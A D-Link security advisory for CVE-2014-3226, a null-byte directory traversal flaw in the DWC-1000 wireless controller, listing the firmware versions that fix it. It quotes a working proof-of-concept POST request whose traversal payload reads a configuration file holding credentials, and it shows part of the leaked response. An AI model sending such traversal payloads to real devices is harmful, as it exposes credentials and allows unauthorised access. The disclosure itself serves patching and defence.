Overview
The DWC-1000 Rev. Ax is a wireless controller by D-Link used to control, manage, optimize coverage of multiple D-Link access points on the same network. Access points supported by the DWC-1000 are DWL-2600AP, DWL-3600AP, DWL-6600AP, and DWL-8600AP and are not affected by this advisory.
The DWC-10000 contains a flaw exploited by a null byte injection attack in the URL that allows directory/file/path traversal. All files on the system can be seen, including but not limited to /etc/shadow, /etc/passwd and temporary configuration files. A malicious user can successfully logon using the credentials stored within some of the files, which may lead to unauthorized configuration changes and/or the device becoming unstable.
References
Holistic Security Consulting Gmbh - Contacted directly though security@dlink.com - March 25, 2014
CVE-2014-3226
Description
In order to maintain author's intent of the disclosure please contact them for further details and questions: https://www.holisticsec.com
The following is stated directly from the original report by Holistic Security Consulting Gmbh
===================================
== Proof-of-Concept Request
===================================
POST /platform.cgi HTTP/1.1
Host: 192.168.7.2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199
thispage=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fteamf1.cfg.ascii%00index.htm&Users.UserName=admin&Users.Password=b&button.login.Users.deviceStatus=Login
===================================
== Proof-of-Concept Response
===================================
The following file contains credentials and everything.
HTTP/1.1 200 OK
Date: Tue, 25 Mar 2014 15:50:42 GMT
Server: Light Weight Web Server
Content-Length: 143011
CaptivePortal = {}
CaptivePortal[1] = {}
CaptivePortal[1]["enable"] = "0"
CaptivePortal[1]["_ROWID_"] = "1"
cpGlobalMode = {}
cpGlobalMode[1] = {}
cpGlobalMode[1]["cpMode"] = "1"
CaptivePortalVlan = {}
CaptivePortalSSID = {}
CaptivePortalSSID[1] = {}
CaptivePortalSSID[1]["ssid"] = "Company_Intern"
Affected Product
|
Model Name
|
HW Version
|
Current FW Version
|
New FW Version for this exploit fix
|
|
DWC-1000
|
Ax
|
v. 4.2.0.6_WW and older
|
FW: 4.2.0.6b303_WW
Release Notes: Link
|
Security patch for your D-Link Devices
These firmware updates address the security vulnerabilities in affected D-Link devices. D-Link will update this continually and we strongly recommend all users to install the relevant updates.
As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.